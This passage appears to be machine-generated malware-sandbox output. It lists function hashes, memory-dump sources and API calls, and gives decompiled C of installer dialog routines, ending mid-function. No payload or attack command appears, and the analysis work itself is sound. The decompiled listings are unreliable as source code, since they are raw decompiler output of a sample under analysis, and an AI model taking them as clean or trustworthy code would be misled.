Instruction Fuzzy Hash: 29519D765083899FCB35CEA8DCA57EE7B77AF92330F54811DD88A5BA85E3704582C701

Uniqueness

Uniqueness Score: -1.00%

Function 033BF35C Relevance: .2, Instructions: 177COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000001.00000002.4862667877.00000000033A0000.00000040.00001000.00020000.00000000.sdmp, Offset: 033A0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_33a0000_file.jbxd

Yara matches

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 3be39ec0210f83db09c9812badde925db5e059d937a0d79293c506c010a5587d
Instruction ID: d20a5f5298ef182a206e68ae2af9872e341270eedbc32fe280ca6725ee3ce9a8
Opcode Fuzzy Hash: 3be39ec0210f83db09c9812badde925db5e059d937a0d79293c506c010a5587d
Instruction Fuzzy Hash: 7B5168305057158FDB28CE388CE97E677B9EF01764F5952AFCD868B9A2C7318981C741

Uniqueness

Uniqueness Score: -1.00%

Function 033B2E62 Relevance: .2, Instructions: 165libraryCOMMON

Download Yara Rule

APIs

LoadLibraryA.KERNELBASE(?,8E3D722A,?,033BCD41), ref: 033BC1CC

Memory Dump Source

Source File: 00000001.00000002.4862667877.00000000033A0000.00000040.00001000.00020000.00000000.sdmp, Offset: 033A0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_33a0000_file.jbxd

Yara matches

Similarity

API ID: LibraryLoad
String ID:
API String ID: 1029625771-0
Opcode ID: e9e31b08dd0e7729ff41f1c5d8137a623ef9e9cbd8404475498180bdff81fc87
Instruction ID: 7b72a683bb7ddea5c6a3cfffd78e0b9f3094c51d1a39e744d489013005253a82
Opcode Fuzzy Hash: e9e31b08dd0e7729ff41f1c5d8137a623ef9e9cbd8404475498180bdff81fc87
Instruction Fuzzy Hash: F251F8765183DAA7CB358EE8E8693EE7F666F42330F44851DD8896B987E7B044428702

Uniqueness

Uniqueness Score: -1.00%

Function 033B1815 Relevance: .1, Instructions: 140COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000001.00000002.4862667877.00000000033A0000.00000040.00001000.00020000.00000000.sdmp, Offset: 033A0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_33a0000_file.jbxd

Yara matches

Similarity

API ID:
String ID:
API String ID:
Opcode ID: d341da5651a91ec234eaf4623592230409969e88c0d2fe600b7898c4e6bc8f72
Instruction ID: 4aa5f629e571f0ce26a5b0a03d8f3eeb0c224d005ef859bb9145de0daec6a9af
Opcode Fuzzy Hash: d341da5651a91ec234eaf4623592230409969e88c0d2fe600b7898c4e6bc8f72
Instruction Fuzzy Hash: 6851F471A047498FCB349F288CA5BEB77B6EF89390F82051DDDCA9B650D3704981CB52

Uniqueness

Uniqueness Score: -1.00%

Function 033B5E6F Relevance: .1, Instructions: 136COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000001.00000002.4862667877.00000000033A0000.00000040.00001000.00020000.00000000.sdmp, Offset: 033A0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_33a0000_file.jbxd

Yara matches

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 94a21028fa58e2e3d68668c9d2a600de12b9a0ca2645d6b40f9eadf4737dd828
Instruction ID: bdc56818fd2bea4e4c9d1f28ab5d2754e93aaea635078ebdc910a12b0f7852bc
Opcode Fuzzy Hash: 94a21028fa58e2e3d68668c9d2a600de12b9a0ca2645d6b40f9eadf4737dd828
Instruction Fuzzy Hash: 4C515A719183AA9ACF368EE4959A3C97F71AF17370F08D58CCC896F58BE3B045058B02

Uniqueness

Uniqueness Score: -1.00%

Function 033B629A Relevance: .1, Instructions: 127libraryCOMMON

Download Yara Rule

APIs

LoadLibraryA.KERNELBASE(?,8E3D722A,?,033BCD41), ref: 033BC1CC

Memory Dump Source

Source File: 00000001.00000002.4862667877.00000000033A0000.00000040.00001000.00020000.00000000.sdmp, Offset: 033A0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_33a0000_file.jbxd

Yara matches

Similarity

API ID: LibraryLoad
String ID:
API String ID: 1029625771-0
Opcode ID: 1d53da2183e0bde767ab78522032fde15ef291c8565411d5a7a2b5e390881330
Instruction ID: 7d59476252f0e0aab582257811db88dc58eb27566a87f5fc098c44c0694ca2dd
Opcode Fuzzy Hash: 1d53da2183e0bde767ab78522032fde15ef291c8565411d5a7a2b5e390881330
Instruction Fuzzy Hash: E34105719043CA9BCB31CEE9D9D53EABBF25F06320F08461ED9899BA87D7B09541CB05

Uniqueness

Uniqueness Score: -1.00%

Function 033B5E59 Relevance: .1, Instructions: 125COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000001.00000002.4862667877.00000000033A0000.00000040.00001000.00020000.00000000.sdmp, Offset: 033A0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_33a0000_file.jbxd

Yara matches

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 9de25a6b91857978143ae490cf6a45eb3ef3baf4b40b93606c29f781024563bf
Instruction ID: ca0a8f00a19ebcb5a816d256703884f562b028b58c3c8dcc16a216e3b37c20be
Opcode Fuzzy Hash: 9de25a6b91857978143ae490cf6a45eb3ef3baf4b40b93606c29f781024563bf
Instruction Fuzzy Hash: 6641B731605354CFDB64DF24C9D27D677B6EF163A0F088199CC8A8FA5AC3398949CB52

Uniqueness

Uniqueness Score: -1.00%

Function 033B2F4A Relevance: .1, Instructions: 118COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000001.00000002.4862667877.00000000033A0000.00000040.00001000.00020000.00000000.sdmp, Offset: 033A0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_33a0000_file.jbxd

Yara matches

Similarity

API ID:
String ID:
API String ID:
Opcode ID: c393a6b3546d78b7bb3946e594fd3fd47422dadd2787c42e1bfcd7a9fce52e07
Instruction ID: 61a03e397d863664b1d2bb39dcc60d2a5f83c5ee34bc51e1b94f1e7517ae3d0a
Opcode Fuzzy Hash: c393a6b3546d78b7bb3946e594fd3fd47422dadd2787c42e1bfcd7a9fce52e07
Instruction Fuzzy Hash: 9B41B67641C3EA66CB368AE8E8693DE7F765F42370F44C51D98896B5CBE3E005428702

Uniqueness

Uniqueness Score: -1.00%

Function 033B5DCF Relevance: .1, Instructions: 93COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000001.00000002.4862667877.00000000033A0000.00000040.00001000.00020000.00000000.sdmp, Offset: 033A0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_33a0000_file.jbxd

Yara matches

Similarity

API ID:
String ID:
API String ID:
Opcode ID: f033d9f2f689df819a6e34be50519e69d9c7dcb79851842965ff3441c205297c
Instruction ID: 6c19d24104365a7b36e0c8f7f74e57a17963c4152cbd7d61c4ef3d4f10e63c2f
Opcode Fuzzy Hash: f033d9f2f689df819a6e34be50519e69d9c7dcb79851842965ff3441c205297c
Instruction Fuzzy Hash: 6431416282D2E669CB228BE8A46A6DD7F755F07230F09D59DE8897B587E3E444018342

Uniqueness

Uniqueness Score: -1.00%

Function 033AD722 Relevance: .1, Instructions: 81COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000001.00000002.4862667877.00000000033A0000.00000040.00001000.00020000.00000000.sdmp, Offset: 033A0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_33a0000_file.jbxd

Yara matches

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 57bfa6b326379f753104ba039ea7a1543987235015de401a0f509f631dde0af6
Instruction ID: 6fb4c94ffd8a99e729797aacce9f23e849ea74573312147a9dbc5a6a29874d0e
Opcode Fuzzy Hash: 57bfa6b326379f753104ba039ea7a1543987235015de401a0f509f631dde0af6
Instruction Fuzzy Hash: C0212C8641C7EB21CB2795ECB4BE3DD7F284A03230F48E65DA8893A99BF2C440428706

Uniqueness

Uniqueness Score: -1.00%

Function 033BC7B0 Relevance: .1, Instructions: 69COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000001.00000002.4862667877.00000000033A0000.00000040.00001000.00020000.00000000.sdmp, Offset: 033A0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_33a0000_file.jbxd

Yara matches

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 4a4636304302df632dfe5bb4fa1bebf1f963c8cde50ead9135fd85f0030e8b96
Instruction ID: ae5d6b627bcfd1b27d4c8b647b1c854de5e7ad4433c819cab57b6d149b20e7df
Opcode Fuzzy Hash: 4a4636304302df632dfe5bb4fa1bebf1f963c8cde50ead9135fd85f0030e8b96
Instruction Fuzzy Hash: 0521267AA042448FD730CE2CC8C46D973B9EF48710FA98066D949DFE61D3709D85CB85

Uniqueness

Uniqueness Score: -1.00%

Function 033BC0A6 Relevance: .0, Instructions: 5COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000001.00000002.4862667877.00000000033A0000.00000040.00001000.00020000.00000000.sdmp, Offset: 033A0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_33a0000_file.jbxd

Yara matches

Similarity

API ID:
String ID:
API String ID:
Opcode ID: acfc044bb1fdd927376a58c81a2a4f671f970aa569b1e97ab3a049893c60c603
Instruction ID: 1f8cf151c9215468639ceb844757e2f5aa67a92d3dc2e41a4989dd93f6b7b907
Opcode Fuzzy Hash: acfc044bb1fdd927376a58c81a2a4f671f970aa569b1e97ab3a049893c60c603
Instruction Fuzzy Hash: 0CB00176761A80CFCE96CF09C290F80B3B4FB55B94F4298D4E8519BB22C368EA05CA10

Uniqueness

Uniqueness Score: -1.00%

Function 00404ED0 Relevance: 63.5, APIs: 33, Strings: 3, Instructions: 489
windowmemoryCOMMON

Download Yara Rule

C-Code - Quality: 96%

			E00404ED0(struct HWND__* _a4, int _a8, signed int _a12, int _a16) {
				struct HWND__* _v8;
				struct HWND__* _v12;
				long _v16;
				signed int _v20;
				signed int _v24;
				intOrPtr _v28;
				signed char* _v32;
				int _v36;
				signed int _v44;
				int _v48;
				signed int* _v60;
				signed char* _v64;
				signed int _v68;
				long _v72;
				void* _v76;
				intOrPtr _v80;
				intOrPtr _v84;
				void* _v88;
				void* __ebx;
				void* __edi;
				void* __esi;
				signed int _t198;
				intOrPtr _t201;
				long _t207;
				signed int _t211;
				signed int _t222;
				void* _t225;
				void* _t226;
				int _t232;
				long _t237;
				long _t238;
				signed int _t239;
				signed int _t245;
				signed int _t247;
				signed char _t248;
				signed char _t254;
				void* _t258;
				void* _t260;
				signed char* _t278;
				signed char _t279;
				long _t284;
				struct HWND__* _t291;
				signed int* _t292;
				int _t293;
				long _t294;
				signed int _t295;
				void* _t297;
				long _t298;
				int _t299;
				signed int _t300;
				signed int _t303;
				signed int _t311;
				signed char* _t319;
				int _t324;
				void* _t326;

				_t291 = _a4;
				_v12 = GetDlgItem(_t291, 0x3f9);
				_v8 = GetDlgItem(_t291, 0x408);
				_t326 = SendMessageW;
				_v24 =  *0x42a248;
				_v28 =  *0x42a230 + 0x94;
				if(_a8 != 0x110) {
					L23:
					if(_a8 != 0x405) {
						_t301 = _a16;
					} else {
						_a12 = 0;
						_t301 = 1;
						_a8 = 0x40f;
						_a16 = 1;
					}
					if(_a8 == 0x4e || _a8 == 0x413) {
						_v16 = _t301;
						if(_a8 == 0x413 ||  *((intOrPtr*)(_t301 + 4)) == 0x408) {
							if(( *0x42a239 & 0x00000002) != 0) {
								L41:
								if(_v16 != 0) {
									_t237 = _v16;
									if( *((intOrPtr*)(_t237 + 8)) == 0xfffffe3d) {
										SendMessageW(_v8, 0x419, 0,  *(_t237 + 0x5c));
									}
									_t238 = _v16;
									if( *((intOrPtr*)(_t238 + 8)) == 0xfffffe39) {
										_t301 = _v24;
										_t239 =  *(_t238 + 0x5c);
										if( *((intOrPtr*)(_t238 + 0xc)) != 2) {
											 *(_t239 * 0x818 + _t301 + 8) =  *(_t239 * 0x818 + _t301 + 8) & 0xffffffdf;
										} else {
											 *(_t239 * 0x818 + _t301 + 8) =  *(_t239 * 0x818 + _t301 + 8) | 0x00000020;
										}
									}
								}
								goto L48;
							}
							if(_a8 == 0x413) {
								L33:
								_t301 = 0 | _a8 != 0x00000413;
								_t245 = E00404E1E(_v8, _a8 != 0x413);
								_t295 = _t245;
								if(_t295 >= 0) {
									_t94 = _v24 + 8; // 0x8
									_t301 = _t245 * 0x818 + _t94;
									_t247 =  *_t301;
									if((_t247 & 0x00000010) == 0) {
										if((_t247 & 0x00000040) == 0) {
											_t248 = _t247 ^ 0x00000001;
										} else {
											_t254 = _t247 ^ 0x00000080;
											if(_t254 >= 0) {
												_t248 = _t254 & 0x000000fe;
											} else {
												_t248 = _t254 | 0x00000001;
											}
										}
										 *_t301 = _t248;
										E0040117D(_t295);
										_a12 = _t295 + 1;
										_a16 =  !( *0x42a238) >> 0x00000008 & 0x00000001;
										_a8 = 0x40f;
									}
								}
								goto L41;
							}
							_t301 = _a16;
							if( *((intOrPtr*)(_a16 + 8)) != 0xfffffffe) {
								goto L41;
							}
							goto L33;
						} else {
							goto L48;
						}
					} else {
						L48:
						if(_a8 != 0x111) {
							L56:
							if(_a8 == 0x200) {
								SendMessageW(_v8, 0x200, 0, 0);
							}
							if(_a8 == 0x40b) {
								_t225 =  *0x4236ec;
								if(_t225 != 0) {
									ImageList_Destroy(_t225);
								}
								_t226 =  *0x423700;
								if(_t226 != 0) {
									GlobalFree(_t226);
								}
								 *0x4236ec = 0;
								 *0x423700 = 0;
								 *0x42a280 = 0;
							}
							if(_a8 != 0x40f) {
								L90:
								if(_a8 == 0x420 && ( *0x42a239 & 0x00000001) != 0) {
									_t324 = (0 | _a16 == 0x00000020) << 3;
									ShowWindow(_v8, _t324);
									ShowWindow(GetDlgItem(_a4, 0x3fe), _t324);
								}
								goto L93;
							} else {
								E004011EF(_t301, 0, 0);
								_t198 = _a12;
								if(_t198 != 0) {
									if(_t198 != 0xffffffff) {
										_t198 = _t198 - 1;
									}
									_push(_t198);
									_push(8);
									E00404E9E();
								}
								if(_a16 == 0) {
									L75:
									E004011EF(_t301, 0, 0);
									_v36 =  *0x423700;
									_t201 =  *0x42a248;
									_v64 = 0xf030;
									_v24 = 0;
									if( *0x42a24c <= 0) {
										L86:
										if( *0x42a2de == 0x400) {
											InvalidateRect(_v8, 0, 1);
										}
										if( *((intOrPtr*)( *0x4291fc + 0x10)) != 0) {
											E00404DD9(0x3ff, 0xfffffffb, E00404DF1(5));
										}
										goto L90;
									}
									_t292 = _t201 + 8;
									do {
										_t207 =  *((intOrPtr*)(_v36 + _v24 * 4));
										if(_t207 != 0) {
											_t303 =  *_t292;
											_v72 = _t207;
											_v76 = 8;
											if((_t303 & 0x00000001) != 0) {
												_v76 = 9;
												_v60 =  &(_t292[4]);
												_t292[0] = _t292[0] & 0x000000fe;
											}
											if((_t303 & 0x00000040) == 0) {
												_t211 = (_t303 & 0x00000001) + 1;
												if((_t303 & 0x00000010) != 0) {
													_t211 = _t211 + 3;
												}
											} else {
												_t211 = 3;
											}
											_v68 = (_t211 << 0x0000000b | _t303 & 0x00000008) + (_t211 << 0x0000000b | _t303 & 0x00000008) | _t303 & 0x00000020;
											SendMessageW(_v8, 0x1102, (_t303 >> 0x00000005 & 0x00000001) + 1, _v72);
											SendMessageW(_v8, 0x113f, 0,  &_v76);
										}
										_v24 = _v24 + 1;
										_t292 =  &(_t292[0x206]);
									} while (_v24 <  *0x42a24c);
									goto L86;
								} else {
									_t293 = E004012E2( *0x423700);
									E00401299(_t293);
									_t222 = 0;
									_t301 = 0;
									if(_t293 <= 0) {
										L74:
										SendMessageW(_v12, 0x14e, _t301, 0);
										_a16 = _t293;
										_a8 = 0x420;
										goto L75;
									} else {
										goto L71;
									}
									do {
										L71:
										if( *((intOrPtr*)(_v28 + _t222 * 4)) != 0) {
											_t301 = _t301 + 1;
										}
										_t222 = _t222 + 1;
									} while (_t222 < _t293);
									goto L74;
								}
							}
						}
						if(_a12 != 0x3f9 || _a12 >> 0x10 != 1) {
							goto L93;
						} else {
							_t232 = SendMessageW(_v12, 0x147, 0, 0);
							if(_t232 == 0xffffffff) {
								goto L93;
							}
							_t294 = SendMessageW(_v12, 0x150, _t232, 0);
							if(_t294 == 0xffffffff ||  *((intOrPtr*)(_v28 + _t294 * 4)) == 0) {
								_t294 = 0x20;
							}
							E00401299(_t294);
							SendMessageW(_a4, 0x420, 0, _t294);
							_a12 = _a12 | 0xffffffff;
							_a16 = 0;
							_a8 = 0x40f;
							goto L56;
						}
					}
				} else {
					_v36 = 0;
					_v20 = 2;
					 *0x42a280 = _t291;
					 *0x423700 = GlobalAlloc(0x40,  *0x42a24c << 2);
					_t258 = LoadImageW( *0x42a220, 0x6e, 0, 0, 0, 0);
					 *0x4236f4 =  *0x4236f4 | 0xffffffff;
					_t297 = _t258;
					 *0x4236fc = SetWindowLongW(_v8, 0xfffffffc, E004054DD);
					_t260 = ImageList_Create(0x10, 0x10, 0x21, 6, 0);
					 *0x4236ec = _t260;
					ImageList_AddMasked(_t260, _t297, 0xff00ff);
					SendMessageW(_v8, 0x1109, 2,  *0x4236ec);
					if(SendMessageW(_v8, 0x111c, 0, 0) < 0x10) {
						SendMessageW(_v8, 0x111b, 0x10, 0);
					}
					DeleteObject(_t297);
					_t298 = 0;
					do {
						_t266 =  *((intOrPtr*)(_v28 + _t298 * 4));
						if( *((intOrPtr*)(_v28 + _t298 * 4)) != 0) {
							if(_t298 != 0x20) {
								_v20 = 0;
							}
							SendMessageW(_v12, 0x151, SendMessageW(_v12, 0x143, 0, E00406544(_t298, 0, _t326, 0, _t266)), _t298);
						}
						_t298 = _t298 + 1;
					} while (_t298 < 0x21);
					_t299 = _a16;
					_push( *((intOrPtr*)(_t299 + 0x30 + _v20 * 4)));
					_push(0x15);
					E00404463(_a4);
					_push( *((intOrPtr*)(_t299 + 0x34 + _v20 * 4)));
					_push(0x16);
					E00404463(_a4);
					_t300 = 0;
					_v16 = 0;
					if( *0x42a24c <= 0) {
						L19:
						SetWindowLongW(_v8, 0xfffffff0, GetWindowLongW(_v8, 0xfffffff0) & 0x000000fb);
						goto L20;
					} else {
						_t319 = _v24 + 8;
						_v32 = _t319;
						do {
							_t278 =  &(_t319[0x10]);
							if( *_t278 != 0) {
								_v64 = _t278;
								_t279 =  *_t319;
								_v88 = _v16;
								_t311 = 0x20;
								_v84 = 0xffff0002;
								_v80 = 0xd;
								_v68 = _t311;
								_v44 = _t300;
								_v72 = _t279 & _t311;
								if((_t279 & 0x00000002) == 0) {
									if((_t279 & 0x00000004) == 0) {
										 *( *0x423700 + _t300 * 4) = SendMessageW(_v8, 0x1132, 0,  &_v88);
									} else {
										_v16 = SendMessageW(_v8, 0x110a, 3, _v16);
									}
								} else {
									_v80 = 0x4d;
									_v48 = 1;
									_t284 = SendMessageW(_v8, 0x1132, 0,  &_v88);
									_v36 = 1;
									 *( *0x423700 + _t300 * 4) = _t284;
									_v16 =  *( *0x423700 + _t300 * 4);
								}
							}
							_t300 = _t300 + 1;
							_t319 =  &(_v32[0x818]);
							_v32 = _t319;
						} while (_t300 <  *0x42a24c);
						if(_v36 != 0) {
							L20:
							if(_v20 != 0) {
								E00404498(_v8);
								goto L23;
							} else {
								ShowWindow(_v12, 5);
								E00404498(_v12);
								L93:
								return E004044CA(_a8, _a12, _a16);
							}
						}
						goto L19;
					}
				}
			}

0x00404ed7
0x00404ef0
0x00404ef5
0x00404efd
0x00404f03
0x00404f19
0x00404f1c
0x00405147
0x0040514e
0x00405162
0x00405150
0x00405152
0x00405155
0x00405156
0x0040515d
0x0040515d
0x0040516e
0x0040517c
0x0040517f
0x00405195
0x0040520a
0x0040520d
0x0040520f
0x00405219
0x00405227
0x00405227
0x00405229
0x00405233
0x00405239
0x0040523c
0x0040523f
0x0040525a
0x00405241
0x0040524b
0x0040524b
0x0040523f
0x00405233
0x00000000
0x0040520d
0x0040519a
0x004051a5
0x004051aa
0x004051b1
0x004051b6
0x004051ba
0x004051c5
0x004051c5
0x004051c9
0x004051cd
0x004051d1
0x004051e4
0x004051d3
0x004051d3
0x004051da
0x004051e0
0x004051dc
0x004051dc
0x004051dc
0x004051da
0x004051e8
0x004051ea
0x004051fd
0x00405200
0x00405203
0x00405203
0x004051cd
0x00000000
0x004051ba
0x0040519c
0x004051a3
0x00000000
0x00000000
0x00000000
0x00000000
0x00000000
0x00000000
0x0040525d
0x0040525d
0x00405264
0x004052d5
0x004052dd
0x004052e5
0x004052e5
0x004052ee
0x004052f0
0x004052f7
0x004052fa
0x004052fa
0x00405300
0x00405307
0x0040530a
0x0040530a
0x00405310
0x00405316
0x0040531c
0x0040531c
0x00405329
0x0040548a
0x00405491
0x004054ae
0x004054b4
0x004054c6
0x004054c6
0x00000000
0x0040532f
0x00405331
0x00405336
0x0040533b
0x00405340
0x00405342
0x00405342
0x00405343
0x00405344
0x00405346
0x00405346
0x0040534e
0x0040538f
0x00405391
0x004053a1
0x004053a4
0x004053a9
0x004053b0
0x004053b3
0x00405455
0x0040545e
0x00405466
0x00405466
0x00405474
0x00405485
0x00405485
0x00000000
0x00405474
0x004053b9
0x004053bc
0x004053c2
0x004053c7
0x004053c9
0x004053cb
0x004053d1
0x004053d8
0x004053dd
0x004053e4
0x004053e7
0x004053e7
0x004053ee
0x004053fa
0x004053fe
0x00405400
0x00405400
0x004053f0
0x004053f2
0x004053f2
0x00405420
0x0040542c
0x0040543b
0x0040543b
0x0040543d
0x00405440
0x00405449
0x00000000
0x00405350
0x0040535b
0x0040535e
0x00405363
0x00405365
0x00405369
0x00405379
0x00405383
0x00405385
0x00405388
0x00000000
0x00000000
0x00000000
0x00000000
0x0040536b
0x0040536b
0x00405371
0x00405373
0x00405373
0x00405374
0x00405375
0x00000000
0x0040536b
0x0040534e
0x00405329
0x0040526c
0x00000000
0x00405282
0x0040528c
0x00405291
0x00000000
0x00000000
0x004052a3
0x004052a8
0x004052b4
0x004052b4
0x004052b6
0x004052c5
0x004052c7
0x004052cb
0x004052ce
0x00000000
0x004052ce
0x0040526c
0x00404f22
0x00404f27
0x00404f30
0x00404f37
0x00404f49
0x00404f54
0x00404f5a
0x00404f68
0x00404f7c
0x00404f81
0x00404f8e
0x00404f93
0x00404fa9
0x00404fba
0x00404fc7
0x00404fc7
0x00404fca
0x00404fd0
0x00404fd2
0x00404fd5
0x00404fda
0x00404fdf
0x00404fe1
0x00404fe1
0x00405001
0x00405001
0x00405003
0x00405004
0x00405009
0x0040500f
0x00405013
0x00405018
0x00405020
0x00405024
0x00405029
0x0040502e
0x00405036
0x00405039
0x00405109
0x0040511c
0x00000000
0x0040503f
0x00405042
0x00405045
0x00405048
0x00405048
0x0040504e
0x00405057
0x0040505a
0x0040505e
0x00405061
0x00405064
0x0040506d
0x00405076
0x00405079
0x0040507c
0x0040507f
0x004050bd
0x004050e8
0x004050bf
0x004050ce
0x004050ce
0x00405081
0x00405084
0x00405092
0x0040509c
0x004050a4
0x004050ab
0x004050b6
0x004050b6
0x0040507f
0x004050ee
0x004050ef
0x004050fb
0x004050fb
0x00405107
0x00405122
0x00405125
0x00405142
0x00000000
0x00405127
0x0040512c
0x00405135
0x004054c8
0x004054da
0x004054da
0x00405125
0x00000000
0x00405107
0x00405039

APIs

GetDlgItem.USER32(?,000003F9), ref: 00404EE8
GetDlgItem.USER32(?,00000408), ref: 00404EF3
GlobalAlloc.KERNEL32(00000040,?), ref: 00404F3D
LoadImageW.USER32(0000006E,00000000,00000000,00000000,00000000), ref: 00404F54
SetWindowLongW.USER32(?,000000FC,004054DD), ref: 00404F6D
ImageList_Create.COMCTL32(00000010,00000010,00000021,00000006,00000000), ref: 00404F81
ImageList_AddMasked.COMCTL32(00000000,00000000,00FF00FF), ref: 00404F93
SendMessageW.USER32(?,00001109,00000002), ref: 00404FA9
SendMessageW.USER32(?,0000111C,00000000,00000000), ref: 00404FB5
SendMessageW.USER32(?,0000111B,00000010,00000000), ref: 00404FC7
DeleteObject.GDI32(00000000), ref: 00404FCA
SendMessageW.USER32(?,00000143,00000000,00000000), ref: 00404FF5
SendMessageW.USER32(?,00000151,00000000,00000000), ref: 00405001
SendMessageW.USER32(?,00001132,00000000,?), ref: 0040509C
SendMessageW.USER32(?,0000110A,00000003,00000110), ref: 004050CC

Part of subcall function 00404498: SendMessageW.USER32(00000028,?,00000001,004042C3), ref: 004044A6

SendMessageW.USER32(?,00001132,00000000,?), ref: 004050E0
GetWindowLongW.USER32(?,000000F0), ref: 0040510E
SetWindowLongW.USER32(?,000000F0,00000000), ref: 0040511C
ShowWindow.USER32(?,00000005), ref: 0040512C
SendMessageW.USER32(?,00000419,00000000,?), ref: 00405227
SendMessageW.USER32(?,00000147,00000000,00000000), ref: 0040528C
SendMessageW.USER32(?,00000150,00000000,00000000), ref: 004052A1
SendMessageW.USER32(?,00000420,00000000,00000020), ref: 004052C5
SendMessageW.USER32(?,00000200,00000000,00000000), ref: 004052E5
ImageList_Destroy.COMCTL32(?), ref: 004052FA
GlobalFree.KERNEL32(?), ref: 0040530A
SendMessageW.USER32(?,0000014E,00000000,00000000), ref: 00405383
SendMessageW.USER32(?,00001102,?,?), ref: 0040542C
SendMessageW.USER32(?,0000113F,00000000,00000008), ref: 0040543B
InvalidateRect.USER32(?,00000000,00000001), ref: 00405466
ShowWindow.USER32(?,00000000), ref: 004054B4
GetDlgItem.USER32(?,000003FE), ref: 004054BF
ShowWindow.USER32(00000000), ref: 004054C6

Strings

, xrefs: 0040549E
M, xrefs: 00405084
N, xrefs: 00405165

Memory Dump Source

Source File: 00000001.00000002.4859355724.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000001.00000002.4859311809.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.4859428028.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.4859481306.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.4859636138.0000000000422000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.4859683026.0000000000427000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.4859732529.0000000000437000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.4859786598.0000000000448000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.4859892187.0000000000453000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.4860199540.0000000000488000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.4860265743.000000000048D000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.4860375416.000000000049A000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_400000_file.jbxd

Similarity

API ID: MessageSend$Window$Image$ItemList_LongShow$Global$AllocCreateDeleteDestroyFreeInvalidateLoadMaskedObjectRect
String ID: $M$N
API String ID: 2564846305-813528018
Opcode ID: 8525e20a0051abda158ee0026944c2010c5087461c76e87d86fd24a5c04b36c4
Instruction ID: f25f8d73efcf6ba6a17deb726488d783a00b9a1a7703c2d4830b1b44d3514242
Opcode Fuzzy Hash: 8525e20a0051abda158ee0026944c2010c5087461c76e87d86fd24a5c04b36c4
Instruction Fuzzy Hash: 34027D70A00609EFDB20DF95CC45AAF7BB5FB84315F10817AE910BA2E1D7798A52CF58

Uniqueness

Uniqueness Score: -1.00%

Function 00404622 Relevance: 37.0, APIs: 19, Strings: 2, Instructions: 204
windowstringCOMMON

Download Yara Rule

C-Code - Quality: 91%

			E00404622(struct HWND__* _a4, int _a8, unsigned int _a12, WCHAR* _a16) {
				intOrPtr _v8;
				int _v12;
				void* _v16;
				struct HWND__* _t56;
				intOrPtr _t69;
				signed int _t75;
				signed short* _t76;
				signed short* _t78;
				long _t92;
				int _t103;
				signed int _t110;
				intOrPtr _t113;
				WCHAR* _t114;
				signed int* _t116;
				WCHAR* _t117;
				struct HWND__* _t118;

				if(_a8 != 0x110) {
					if(_a8 != 0x111) {
						L13:
						if(_a8 != 0x4e) {
							if(_a8 == 0x40b) {
								 *0x4216d4 =  *0x4216d4 + 1;
							}
							L27:
							_t114 = _a16;
							L28:
							return E004044CA(_a8, _a12, _t114);
						}
						_t56 = GetDlgItem(_a4, 0x3e8);
						_t114 = _a16;
						if( *((intOrPtr*)(_t114 + 8)) == 0x70b &&  *((intOrPtr*)(_t114 + 0xc)) == 0x201) {
							_t103 =  *((intOrPtr*)(_t114 + 0x1c));
							_t113 =  *((intOrPtr*)(_t114 + 0x18));
							_v12 = _t103;
							_v16 = _t113;
							_v8 = 0x4281c0;
							if(_t103 - _t113 < 0x800) {
								SendMessageW(_t56, 0x44b, 0,  &_v16);
								SetCursor(LoadCursorW(0, 0x7f02));
								_push(1);
								E004048D1(_a4, _v8);
								SetCursor(LoadCursorW(0, 0x7f00));
								_t114 = _a16;
							}
						}
						if( *((intOrPtr*)(_t114 + 8)) != 0x700 ||  *((intOrPtr*)(_t114 + 0xc)) != 0x100) {
							goto L28;
						} else {
							if( *((intOrPtr*)(_t114 + 0x10)) == 0xd) {
								SendMessageW( *0x42a228, 0x111, 1, 0);
							}
							if( *((intOrPtr*)(_t114 + 0x10)) == 0x1b) {
								SendMessageW( *0x42a228, 0x10, 0, 0);
							}
							return 1;
						}
					}
					if(_a12 >> 0x10 != 0 ||  *0x4216d4 != 0) {
						goto L27;
					} else {
						_t69 =  *0x4226e0; // 0x5bc3cc
						_t29 = _t69 + 0x14; // 0x5bc3e0
						_t116 = _t29;
						if(( *_t116 & 0x00000020) == 0) {
